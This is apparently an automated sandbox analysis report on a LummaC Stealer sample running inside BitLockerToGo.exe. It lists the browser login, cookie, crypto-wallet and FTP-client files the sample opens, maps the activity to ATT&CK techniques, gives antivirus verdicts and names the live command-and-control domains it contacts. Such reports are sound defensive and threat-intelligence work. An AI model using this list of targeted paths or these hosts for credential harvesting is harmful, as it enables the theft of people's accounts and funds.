              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\logins.jsonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\prefs.jsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\places.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\cert9.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: Yara matchFile source: 00000003.00000003.1725784713.0000000003326000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7912, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7912, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		311
              Process Injection              		21
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		221
              Security Software Discovery              		Remote Services1
              Screen Capture              		21
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		311
              Process Injection              		LSASS Memory21
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin Shares41
              Data from Local System              		113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
              Obfuscated Files or Information              		NTDS1
              File and Directory Discovery              		Distributed Component Object Model2
              Clipboard Data              		Protocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets32
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              64pOGv7k4N.exe74%ReversingLabsWin32.Trojan.LummaStealer
              64pOGv7k4N.exe72%VirustotalBrowse
              64pOGv7k4N.exe100%AviraHEUR/AGEN.1309172
              64pOGv7k4N.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              mooncobudy.click100%Avira URL Cloudmalware
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696513144932.12791&key=16965131444007000%Avira URL Cloudsafe
              https://mooncobudy.click/d&100%Avira URL Cloudmalware
              https://mooncobudy.click:443/apiv1np.default-release/key4.dbPK100%Avira URL Cloudmalware
              https://mooncobudy.click/100%Avira URL Cloudmalware
              https://mooncobudy.click:443/apiM100%Avira URL Cloudmalware
              https://mooncobudy.click/apijYc100%Avira URL Cloudmalware
              https://mooncobudy.click:443/api100%Avira URL Cloudmalware
              https://mooncobudy.click/api100%Avira URL Cloudmalware
              https://mooncobudy.click/4%G##100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              s-part-0017.t-0009.t-msedge.net
              		13.107.246.45
              		truefalse
                		high
                mooncobudy.click
                		188.114.97.3
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  rabidcowse.shopfalse
                    		high
                    wholersorie.shopfalse
                      		high
                      mooncobudy.clicktrue
                      • Avira URL Cloud: malware
                      		unknown
                      cloudewahsj.shopfalse
                        		high
                        noisycuttej.shopfalse
                          		high
                          https://mooncobudy.click/apitrue
                          • Avira URL Cloud: malware
                          		unknown
                          nearycrepso.shopfalse
                            		high
                            framekgirus.shopfalse
                              		high
                              tirepublicerj.shopfalse
                                		high
                                abruptyopsn.shopfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://mooncobudy.click:443/apiBitLockerToGo.exe, 00000003.00000002.1766484120.00000000032A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://mooncobudy.click/apijYcBitLockerToGo.exe, 00000003.00000003.1708169040.00000000056D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://mooncobudy.click/d&BitLockerToGo.exe, 00000003.00000002.1766664426.0000000003338000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1746691528.0000000003329000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1741691153.0000000003329000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1766085473.0000000003337000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoBitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696513144932.12791&key=1696513144400700003.1&ctaBitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
